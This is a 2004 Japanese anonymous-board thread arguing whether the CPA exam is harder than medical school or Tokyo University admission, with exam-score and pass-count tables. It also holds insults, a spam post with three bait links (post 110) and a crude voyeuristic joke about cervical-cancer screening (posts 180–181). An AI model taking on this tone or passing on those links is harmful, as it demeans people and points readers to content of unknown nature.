99 :一般に公正妥当と認められた名無しさん:04/04/14 05:29 ID:???
>>98
あなたは理Vもしくは京医に通われている、又は卒業された
或いは合格されたのですよね?(w

100 :一般に公正妥当と認められた名無しさん:04/04/14 06:41 ID:TaEKg2rn
会計士>>>>>>>>>>>>>理V>京医

ぐらいだな。

101 :一般に公正妥当と認められた名無しさん:04/04/14 09:10 ID:???
理V  偏差値76
京医  偏差値75
会計士 偏差値60

くらいだろ。



102 :一般に公正妥当と認められた名無しさん:04/04/14 13:32 ID:???
会計士受かったあともし理V入れてやるって言われたらよろこん会計士捨てるな

103 :一般に公正妥当と認められた名無しさん:04/04/14 15:55 ID:GeUvLLg5
>>99
東大理Tヲチてますが何か?
DQNW大。。。

104 :一般に公正妥当と認められた名無しさん:04/04/14 16:19 ID:GeUvLLg5
後期で山梨医大には合格。。。

105 :一般に公正妥当と認められた名無しさん:04/04/14 16:31 ID:???
 || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄||
 ||
 || ○ このスレは板違いなので終了です。 既に削除依頼も出されています。
 || ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 || ○ これ以降の書き込みは、削除されにくくなるので控えて下さい。
 ||
 || ○ 糞スレ放置にご協力お願いします。     Λ_Λ 
 ||                            \ (゚ー゚*) キホン。
 ||                               ⊂⊂ |
 ||___ ∧ ∧__∧ ∧__ ∧ ∧_      | ̄ ̄ ̄ ̄|
      (  ∧ ∧__ (   ∧ ∧__(   ∧ ∧     ̄ ̄ ̄
    〜(_(  ∧ ∧_ (  ∧ ∧_ (  ∧ ∧  は〜い、先生。
      〜(_(   ,,)〜(_(   ,,)〜(_(   ,,)
        〜(___ノ  〜(___ノ   〜(___ノ



106 :一般に公正妥当と認められた名無しさん:04/04/14 22:06 ID:???
>>105
いろんなスレでそのコピペ貼り付けてる奴ウザイよ。

107 :一般に公正妥当と認められた名無しさん:04/04/14 22:15 ID:???
>>106
氏ね

108 :一般に公正妥当と認められた名無しさん:04/04/14 22:41 ID:???
.       ∧_∧  / ̄ ̄ ̄ ̄ ̄ ̄ ̄
       (;´Д`)< スンマセン、直ぐに片付けます
  -=≡  /    ヽ  \_______
.      /| |   |. |
 -=≡ /. \ヽ/\\_
    /    ヽ⌒)==ヽ_)= ∧_∧
-=   / /⌒\.\ ||  ||  (´・ω・`) >>106
  / /    > ) ||   || ( つ旦O
 / /     / /_||_ || と_)_) _.
 し'     (_つ ̄(_)) ̄ (.)) ̄ (_)) ̄(.))



109 :一般に公正妥当と認められた名無しさん:04/04/14 22:49 ID:???
削除依頼なんてよほど見当違いじゃない限り受理されないぞ。
板できたばっかりでスレ数自体少ないし。


110 :一般に公正妥当と認められた名無しさん:04/04/14 22:54 ID:???
最高に感動する。・゚・(つД`)・゚・
http://nara.cool.ne.jp/tiny05/Happy99.jpg

マジで感動する。・゚・(つД`)・゚・
http://www.xfreehosting.com/asian/bahrat/tb/pics/lo/a.html

涙が止まりませんでした。・゚・(つД`)・゚・
http://monositu7127.hp.infoseek.co.jp/20040402042351.jpg



111 :111:04/04/15 01:44 ID:???

ナンバー111より
オンリー111でつ

112 :一般に公正妥当と認められた名無しさん:04/04/15 04:44 ID:???
うちのじいちゃん東大医学部卒
うちのとうちゃん慶応医学部卒
オレ私大文卒、会計士受験生
なんだかね〜

113 :一般に公正妥当と認められた名無しさん:04/04/15 10:17 ID:???
会計士は企業の医者だ

114 :一般に公正妥当と認められた名無しさん:04/04/15 10:36 ID:???
診断も出来ず、
治す手段もしらず、
患者が重態でも放置して、
亡くなってもしらんぷり

そんなことないですよね。

115 :一般に公正妥当と認められた名無しさん:04/04/15 13:32 ID:???
>>114
診断はするが治すのは会計士の仕事じゃない。

会計士の仕事は診察をして「こいつは健康だ」、「こいつは病気持ちだ」ってのを投資家に教えてやることなんだから。

ただし、癌だと分かっても上司(お上)が告知するなと言ったらそれに従わないといけない。

逆らって公表でもしようものならりそなの癌を公表した会計士のように自殺にまで追い込まれる

まあ、もう癌だと分かって放っておいたら責任問われるようになっちまうが・・・

116 :一般に公正妥当と認められた名無しさん:04/04/15 14:01 ID:???
>>115
もちろん、わかった上でいってますよ。
会計、いや簿記wのコンサルへの皮肉ですなw

117 :一般に公正妥当と認められた名無しさん:04/04/15 14:58 ID:???
今まで通り金融庁や財務省のいいなりになってればいいんだよ。それが一番幸せ。

118 :一般に公正妥当と認められた名無しさん:04/04/15 14:59 ID:???
が〜〜ん。      お粗末さまでした。

119 :一般に公正妥当と認められた名無しさん:04/04/15 15:00 ID:???
医師=コンサルタント 名医もいればヤブもいる

レントゲン技師=会計士 誰がやってもいっしょ

120 :一般に公正妥当と認められた名無しさん:04/04/15 16:49 ID:???
じゃあ中小企業診断士ってどうなるの?

121 :一般に公正妥当と認められた名無しさん:04/04/15 19:58 ID:???
ちゅうか、会計士って、頭つかわん仕事やん。


122 :一般に公正妥当と認められた名無しさん:04/04/15 21:01 ID:???
>>119
人によって結果違ったらお話にならないんで。。。


123 :一般に公正妥当と認められた名無しさん:04/04/15 23:05 ID:???
http://school2.2ch.net/test/read.cgi/exam/1082035713/8

8 名前: 一般に公正妥当と認められた名無しさん 投稿日: 04/04/15 22:52 ID:Y4ive4UR
だってぇ〜↓立てたの俺だも〜んw 全然削除されないやw

国公立医学部と公認会計士どっちが難しいですか?
http://school2.2ch.net/test/read.cgi/exam/1080869476/

東大文Uと公認会計士どっちが難しい
http://school2.2ch.net/test/read.cgi/exam/1080893682/



124 :一般に公正妥当と認められた名無しさん:04/04/15 23:16 ID:???
http://school2.2ch.net/test/read.cgi/exam/1082035713/13
13 名前: 一般に公正妥当と認められた名無しさん 投稿日: 04/04/15 23:07 ID:Y4ive4UR
プ
悔しかったら削除してみろ〜いw


125 :一般に公正妥当と認められた名無しさん:04/04/15 23:22 ID:Y4ive4UR
何してんの?w

126 :一般に公正妥当と認められた名無しさん:04/04/16 06:14 ID:???
東京の一流大学ロースクール>=東京の医学部>地方国立医学部
易しさからかんがえてもこれ。
ただ18歳で人生決定という意味なら医学部。

会計士はうかるかどうかわからん。

みんなが考えてるよりはるかに難しいのが会計士。
おれは断念組だからいえるけどいったんえらんでそういう道しかなくなって
いるからいわないけどやっぱり超難関。

127 :一般に公正妥当と認められた名無しさん:04/04/16 13:08 ID:???
去年学生の合格者200人以上出たのか・・・

128 :一般に公正妥当と認められた名無しさん:04/04/16 22:42 ID:???
>>126
それは君がアフォなだけやん。

129 :一般に公正妥当と認められた名無しさん:04/04/16 23:51 ID:lH0uLtSv
ビジネスと医療を変な比べ方してますね。
イチローとナカータどっちがスポーツ上手いの?

130 :一般に公正妥当と認められた名無しさん:04/04/16 23:55 ID:???
イチロー

131 :一般に公正妥当と認められた名無しさん:04/04/17 00:11 ID:???
会計士受験生って司法や国立医学部に明らかに負けてるのに
認められないヤツばっかりだな

132 :一般に公正妥当と認められた名無しさん:04/04/17 02:21 ID:???
そんなもんに勝ち負けなんてない。

133 :一般に公正妥当と認められた名無しさん:04/04/17 02:23 ID:???
ここは会計士コンプのヒガミを書き込む板ですか?

134 :一般に公正妥当と認められた名無しさん:04/04/17 02:34 ID:???
司法試験か公認会計士好きな方に受からせてやるていわれたらどっち取る?

135 :一般に公正妥当と認められた名無しさん:04/04/17 08:17 ID:GdufgToh
漏れは会計士。

136 :一般に公正妥当と認められた名無しさん:04/04/17 11:07 ID:OM1W2OSL
国立医学部っても理科がなっかたり小論だけだったり下位はすごく難しいわけじゃない。
一部の医学部はそりゃ会計士より難しいだろうが、あとの私大含めた医学部はそんなことないと思う。
弁護士の仕事はしゃべりがうまくないと難しい。受かってからもすごい競争社会だと思うから俺も会計士。


137 :一般に公正妥当と認められた名無しさん:04/04/17 11:45 ID:???
>受かってからもすごい競争社会だと思うから俺も会計士。
ばかじゃない?

だからさ、そんなのあたりまえなの。
法律が毎年変るからそれに備えて勉強しないと、、、とかあほなこと
いっているボケナスもいるけどさw
そりゃ、相対的なアホが多い文系出身だから、そのぐらいで
競争社会だとかぎゃーぎゃーさわいでいるのかもしれないけどさ、
ほんとの競争社会をみてみ、文系のアホにはサバイブはむりかもしれんよ
ああ、レベルの低い層のきょうそうだから、それでもいいのかw

ぎゃはははははははははは、だから会計士というより文系はバカなんだ

138 :一般に公正妥当と認められた名無しさん:04/04/17 11:48 ID:???
会計士受験生って司法や国立医学部に明らかに負けてるのに
認められないヤツばっかりだな
>>132>>135>>136







139 :一般に公正妥当と認められた名無しさん:04/04/17 12:04 ID:4B11r306
会計>>>>>>>>>司法>>>>>>>>>>>>医学部

これくらいだね。

140 :一般に公正妥当と認められた名無しさん:04/04/17 12:08 ID:ePFuleyx
極端な話、弁護士も会計士もいなくてもいい。
生きるか死ぬかってなったら残るのは医者だけ。


141 :一般に公正妥当と認められた名無しさん:04/04/17 12:10 ID:4B11r306
医者よりも農家がいないと困るよ。 ぷぷ

142 :一般に公正妥当と認められた名無しさん:04/04/17 12:17 ID:ePFuleyx
食料は自給できないこともない。

143 :一般に公正妥当と認められた名無しさん:04/04/17 12:43 ID:OM1W2OSL
>>法律が毎年変るからそれに備えて勉強しないと、、、ってのを競争社会といったんではないの。
そんなんは医者だろうが会計士だろうが同じ。
法職は仕事の内容も勝ち負けのある競争だろ。
まあ大学受験でいくら頑張っても理系は文系につかわれちゃうんだよ。残念だったね。

144 :一般に公正妥当と認められた名無しさん:04/04/17 16:58 ID:???
>>143
>まあ大学受験でいくら頑張っても理系は文系につかわれちゃうんだよ。残念だったね。
医者がアホの文系には使われていないがw
厚生省から使われているとでも言いたいのか?w 
ばかめが

145 :一般に公正妥当と認められた名無しさん:04/04/17 18:21 ID:???
アホの文系には使われてないだろうが、偉い文系に使われてたりして。まぁ、健康な人には相手にもされないだろうし。

146 :一般に公正妥当と認められた名無しさん:04/04/17 19:23 ID:???
勝ち負けを論じてる人で
誰かに何か勝ててる人がいるのかな。

147 :一般に公正妥当と認められた名無しさん:04/04/17 19:32 ID:???
企業相手の仕事してる弁護士は東大卒が中心なの?

148 :一般に公正妥当と認められた名無しさん:04/04/17 20:32 ID:???
>>146
お前みたいなヤツが謙虚なふりして人一倍プライド高いんだよな
会計士受験生の典型

149 :一般に公正妥当と認められた名無しさん:04/04/17 20:35 ID:ohZb84nQ
ここって精神年齢低いよな。
学歴系みんなそうか。

150 :一般に公正妥当と認められた名無しさん:04/04/18 02:30 ID:???
2チャンで比較したがるやつは、医学部でもなければ、東大でも会計士でも弁護士でもない、ただの無能なコンプ。
(w

151 :一般に公正妥当と認められた名無しさん:04/04/18 06:13 ID:???
会計士受けてる時点でたいしたことないんだから
つならんプライドは捨てようぜ

152 :一般に公正妥当と認められた名無しさん:04/04/18 11:29 ID:???
医者目指す奴は社会で通用しないやつだろ。

153 :一般に公正妥当と認められた名無しさん:04/04/18 13:05 ID:86jo0MjX
>>152 そうかな?

154 :一般に公正妥当と認められた名無しさん:04/04/18 23:05 ID:XGx0NbWf
東大の8割がCPA試験落ちるので、東大の上位2割と駅弁医学部
との比較なら断然CPA試験の方が難しいという事になる。
なぜなら東大理系と駅弁医学部が大体同じ程度の偏差値だから。

東大理Vと公認会計士だとどうか?

駅弁で医と他学部との偏差値を比べて、例えば工学部に入った
連中の上位2割が同じ大学の医学部行けるとは思えない。
1割だと考えてもあり得ない。

そう考えると東大理Vなら公認会計士よりも難しいのではあるまいか?

155 :一般に公正妥当と認められた名無しさん:04/04/18 23:11 ID:???
会計士2次合格者の9割以上が東大には落ちるので
東大のほうが断然難しいということにもなるが。


156 :一般に公正妥当と認められた名無しさん:04/04/18 23:26 ID:???
>>155
多分受験生比が最初から9割以上なのでそれは言えない。
下手な鉄砲数打ちゃ当たるです。
例えばCPA受験生東大出身者比が50%でそれ以外が50%で、
合格者が東大の方が50%を割ればCPAより東大の方が
試験に突破するのが難しいとは言える。

しかし東大の方が難しいのならCPAの合格者の半分以上
は占められる筈。

つまり>>155の人は問題の立て方そのものが間違っている。

157 :一般に公正妥当と認められた名無しさん:04/04/18 23:33 ID:9j1aLMe9
>156
いかに、早慶MARCHレベルでも東大落ちが多いか、わかるね。
文I一本にしぼって東大にいけなかった奴でも、最初から文IIにすれば今頃東大生だったのにね。



158 :一般に公正妥当と認められた名無しさん:04/04/19 21:01 ID:???
早慶って阪大と名古屋の間くらいのイメージだけど。
マーチは北大くらいか?神戸・横国よりはマシかな。

159 :一般に公正妥当と認められた名無しさん:04/04/19 21:53 ID:???
会計士においては
マーチ>>地底

160 :一般に公正妥当と認められた名無しさん:04/04/19 21:58 ID:???
それは単に受験者数の差だと思う。

161 :一般に公正妥当と認められた名無しさん:04/04/19 22:09 ID:???
数は力なり

162 :一般に公正妥当と認められた名無しさん:04/04/19 22:32 ID:???
                
    03  02  01  00  計
マーチ
明治 43  38  42  35  158
青山 22  20  14  11   67
立教 18  20  11  18   67 
中央 75  83  59  60  277   
法政 22  22  10  23   77
−−−−−−−−−−−−−−−−
   180 183 136 147  646 


地底
北大 12   8  11   6   37
東北  6   7   5   8   26
名大 30  12  15   9   66  
阪大 34  17  16  17   84
九大  6   9  10   7   32
−−−−−−−−−−−−−−−−
    88  53 57  47  245 

早計
慶應226 172 155 132  685
早大155 136 124  90  505
−−−−−−−−−−−−−−−− 
   381 308 279 222 1190

東一京
東大 77  70  68  50  265 
一橋 70  52  47  35  204
京大 46  34  29  28  137
−−−−−−−−−−−−−−−−
   193 156 144 113  606 


163 :一般に公正妥当と認められた名無しさん:04/04/19 22:51 ID:???
分母も違うだろう。

164 :一般に公正妥当と認められた名無しさん:04/04/19 23:39 ID:???
分母はいっしょだよ、ボケ

165 :一般に公正妥当と認められた名無しさん:04/04/20 00:34 ID:???
私は3流私大中退ですが、中退後約10年で公認会計士に合格しました。
高校の時は勉強なんか嫌いで3流大学にいやいや行くことになりました。
でも中退して会計業務に興味を持ち、そちら方面で仕事をしていると
簿記の資格を取ろう、ってなりました。
それから勉強(?)が楽しくなりました。
この経験から言うと、結局それに興味があるかどうかなんですよね。
国立の医学部に合格しようとすると自分の興味のないことまで勉強しなければなりません。
私は国立医学部を受験したわけではありませんが、一つのことを極める楽しさを覚えれば
だれでも公認会計士は合格出来ると思いますよ。
それが一番難しいことでもあるわけですが・・・

166 :一般に公正妥当と認められた名無しさん:04/04/20 01:30 ID:???
消去法で会計士選んだけど合格できた。
でも思ってたよりもはるかに難しかった。
最後は自分よりアホな奴でも受かってるのに受からなかったらシャレにならんというプライドだけでモチベーションを維持した・・・


167 :一般に公正妥当と認められた名無しさん:04/04/20 15:57 ID:???
>>165
おそらくネタだと思うが本当だったらちょっと尊敬

168 :一般に公正妥当と認められた名無しさん:04/04/22 00:02 ID:???
>>165
2次試験合格とか、3次試験合格とかじゃなくて
公認会計士に合格って言い方がちょっとネタっぽい気もするけど
良いこと言ってると思う

169 :一般に公正妥当と認められた名無しさん:04/04/23 15:27 ID:8B2HVcLq
久々age

170 :一般に公正妥当と認められた名無しさん:04/04/26 23:58 ID:???
国公立医学部って…
大学によっては簡単だと思うけど…

171 :一般に公正妥当と認められた名無しさん:04/04/27 06:36 ID:???
医学部は国公立だと最下位層でも京大工学部並  代ゼミ

東京・理科三類[前]91%・72
京都・医[前]89%・70  
                                                                
<国公立医学部最下位層>        <国公立理工系最上位層> (阪大以下は各学部の最高値と最下位値をそれぞれ掲載)

                          東京・理科一類[前]88%・67
                          東京・理科二類[前]87%・66
福井医科・医[前] 医82%・66      京都・工[前] 地球工83%・66←学部最高
佐賀医科・医[前] 医82%・66      
大分医科・医[前] 医82%・65      京都・工[前]工業化学83%・65
高知医科・医[前] 医82%・65
弘前・医[前] 医82%・65
秋田・医[前] 医82%・65
福島県立医科・医[前]82%・64  
島根医科・医[前] 医81%・64
愛媛・医[前] 医81%・64          大阪・理[前]物理81%・64  ←学部最高
                          京都・工[前]電気電子工83%・63 
                          東京工業・第4類[前]82%・63
                          九州・工[前]機械航空工82%・63 
                          大阪・理[前]数学79%・63  ←学部最下位  
                          大阪・基礎工[前] 化学応用科学79%・63 
                          東北・理[前]物理系83%・62
                          九州・理[前]生物81%・62
                          東北・工[前]バイオ系79%・62
                          大阪・工[前] 応用理工78%・62
                          大阪・工[前] 地球総合77%・62
                          名古屋・工[前]機械・航空工81%・61 
                          北海道・理[前]生物系81%・61
                          東京工業・第2類[前]79%・61 
                          大阪・基礎工[前] システム科学78%・61 
                          名古屋・理[前]79%・60 ←学科共通
                          九州・理[前]地球79%・60
                          九州・工[前]環境工79%・60
                          東北・理[前]地球科学系81%・59
                          東北・工[前]人間・環境系77%・59                          
                          名古屋・工[前] 物理工79%・58
                          北海道・工[前]物理工学系78%・58
                          北海道・理[前]数理系78%・57
                          北海道・工[前]社会工学系76%・57
               

172 :一般に公正妥当と認められた名無しさん:04/04/28 12:52 ID:f4ZxEXXh
>>171
センター2次の配点割合と科目数が違うよ。
地方国立医はセンター配点高く2次科目数が少ない。
京大理系はセンターでは国社に傾斜配点がある

そういうの無視して比較すると東大文系<東京外大とかになっちゃうよ?

173 :一般に公正妥当と認められた名無しさん:04/04/28 15:18 ID:???
東大京大理系 英数理×2+国

地方国立医、旧帝理系 英数理×2

174 :一般に公正妥当と認められた名無しさん:04/04/28 15:44 ID:???
京大工学部は2次に国語ないけど・・・ 駅弁医は2次2科目のとこがあるね。 配点割合はあんまり関係ないと思うけどね。

京都・工[前]物理工  85%・66  センター:2次 300:700 センター5教科7科目 2次 3教科4科目(理科2科目)・・・京大工トップ
佐賀医科・医[前]  医82%・66  センター:2次 450:450 センター5教科7科目 2次 3教科4科目(理科2科目   
京都・工[前]工業化学83%・65  センター:2次 300:700 センター5教科7科目 2次 3教科4科目(理科2科目)
大分医科・医[前]  医82%・65  センター:2次 450:450 センター5教科7科目 2次 3教科4科目(理科2科目)  
高知医科・医[前]  医82%・65  センター:2次 700:400 センター5教科7科目 2次 2教科2科目←プッw  
弘前・医[前]     医82%・65  センター:2次 900:900 センター5教科7科目 2次 3教科4科目(理科2科目)
秋田・医[前]     医82%・65  センター:2次 700:500 センター5教科7科目 2次 2教科2科目←プッw
福島県立医・医[前]  82%・64  センター:2次 600:700 センター5教科7科目 2次 3教科4科目(理科2科目)  
京都・工[前]電気電子83%・63  センター:2次 300:700 センター5教科7科目 2次 3教科4科目(理科2科目)・・・京大工ビリ


175 :一般に公正妥当と認められた名無しさん:04/04/29 20:05 ID:???
85%の63くらいだな。
センターのが得意。

176 :一般に公正妥当と認められた名無しさん:04/04/30 22:21 ID:???
公認会計士を目指す人は、嫌われ役になることを受け入れられないとだめです。
会計士は仕事上、他人の職場に乗りこんであれこれ指示したり、接待を受けたり、
また、その被監査会社から報酬をもらってるため、嫌われることが多いです。
なので、中には会計士をわざわざ他の職業(医者や弁護士やコンサルタント等)と比較して、
会計士を否定する人が多いです。私の父は会社で経理をやっていたので、いつも会計士の悪口を言ってました。
特に、日本では監査の意義を理解できていない人がほとんどで、
大会社の社長ですら監査は無駄なコストだと考えている人もいるくらいですので、嫌われることは覚悟しておいてください。

【参 考】公認会計士を嫌う人の例
・会社の経理担当者(監査報酬を払ってるのに、会計士を「先生」と呼ばなければならず、
 あれこれ指示するから)
・高学歴だけど会社ではあまり待遇の良くない会社員(会計士が自分より上で、自分は会計士未満という現実を
 受け入れられないコンプレックスの塊だから)
・会計士崩れ(会計士がくだらない職業ということにして、自らの選択が正しかったと思いたいから)
・税理士(会計士のオマケに税理士がついてくるので劣等感がすごいから)

177 :一般に公正妥当と認められた名無しさん:04/04/30 22:29 ID:???
>・高学歴だけど会社ではあまり待遇の良くない会社員(会計士が自分より上で、自分は会計士未満という現実を
 受け入れられないコンプレックスの塊だから)

これって逆じゃない?


178 :177:04/04/30 22:30 ID:???
すまん、間違えた。待遇のよくない会社員に限定してたのね・・

179 :一般に公正妥当と認められた名無しさん:04/04/30 22:46 ID:???
そもそも企業の経理なんて出世コースから外れてるしな。。。
地味だし、コンプレックス持ちのやつが多い。
糞忙しいときに会計士がやってきれ指示されりゃ嫌気さされて当然

180 :一般に公正妥当と認められた名無しさん:04/05/01 00:45 ID:???
なあ、こんどから、子宮癌検診の対象年齢が、
20歳以上になるのだが、おれは反対だ。
おまえらなら俺のいいたいことはわかるはずだ。

181 :一般に公正妥当と認められた名無しさん:04/05/01 11:02 ID:???
>>180
それって、意味分かるけど、処女膜も見れるんですかね?
俺も、方向間違えたな。
今から、方向転換したい。

182 :一般に公正妥当と認められた名無しさん:04/05/01 12:50 ID:???
子宮ガンって何科?

183 :一般に公正妥当と認められた名無しさん:04/05/01 21:47 ID:???
>>182
婦人科じゃないの?

59 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)